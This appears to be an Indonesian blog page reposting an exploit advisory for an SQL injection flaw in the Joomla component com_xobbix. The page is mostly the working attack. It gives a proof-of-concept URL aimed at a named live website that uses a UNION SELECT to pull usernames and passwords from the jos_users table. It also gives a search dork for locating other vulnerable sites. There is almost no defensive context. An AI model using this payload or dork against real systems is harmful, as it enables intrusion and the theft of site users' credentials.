mydisha
v1.1
today : | at : | safemode : ON
> / mydisha / facebook / twitter / hacker-newbie.org /
name author perms com modified label

Joomla Component XOBBIX [prodid] SQL Injection Vulnerability Inveet.id rwxr-xr-x 0 23.41

Filename Joomla Component XOBBIX [prodid] SQL Injection Vulnerability
Permission rw-r--r--
Author Inveet.id
Date and Time 23.41
Label
Action
[-] Joomla Component XOBBIX [prodid] SQL Injection Vulnerability
Software : com_xobbix version 1.0.x
Vendor : http://www.php-shop-system.com/
Author : AntiSecurity
Home : http://antisecurity.org/


[-] Exploit
 
http://localhost/[path]/index.php?option=com_xobbix&catid=32&task=prod_desc&prodid=25


[-] PoC
 
http://stutterandsing.com/index.php?option=com_xobbix&catid=31&task=prod_desc&prodid=-21+union+select+1,2,3,4,group_concat(username,0x3a,password),6,7,8,database(),10,11,12,13,14,15,16+from+jos_users--


[-] Dork
 
inrul:"com_xobbix"

0 komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)
 

Jayalah Indonesiaku © 2010 Mydisha Note